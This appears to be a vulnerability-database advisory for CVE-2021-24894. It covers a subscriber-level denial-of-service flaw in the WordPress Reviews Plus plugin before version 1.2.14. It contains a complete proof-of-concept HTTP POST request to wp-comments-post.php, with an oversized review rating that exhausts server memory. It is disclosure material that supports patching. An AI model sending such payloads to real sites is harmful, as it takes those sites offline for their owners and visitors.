Lucene search

K

Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS

🗓️ 25 Oct 2021 00:00:00Reported by Drew JonesType 
wpexploit
 wpexploit
👁 409 Views

Reviews Plus < 1.2.14 Subscriber+ DoS exploi

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Cvelist
CVE-2021-24894 Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS
23 Nov 202119:16
cvelist
Patchstack
WordPress Reviews Plus plugin <= 1.2.13 - Reviews Denial of Service (DoS) vulnerability
25 Oct 202100:00
patchstack
WPVulnDB
Reviews Plus < 1.2.14 - Subscriber+ Reviews DoS
25 Oct 202100:00
wpvulndb
NVD
CVE-2021-24894
23 Nov 202120:15
nvd
Prion
Design/Logic Flaw
23 Nov 202120:15
prion
CVE
CVE-2021-24894
23 Nov 202120:15
cve
Enable reviews for post/pages, and enable the "Show Reviews on" setting for All posts or pages as well.

Then log in as a user such as subscriber and submit a review with a long rating, e.g

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 181
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

comment_type=ic_rev_post&review_type=ic_rev_post&ic_review_rating=100000000000000000000000&ic_review_title=aa&comment=cerh&submit=Submit+Review&comment_post_ID=2123&comment_parent=0

The review section of the post/page will crash with an error like "Allowed memory size of 268435456 bytes exhausted (tried to allocate 249561152 bytes) in /var/www/wp-content/plugins/reviews-plus/functions/functions.php on line 76" when viewed

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo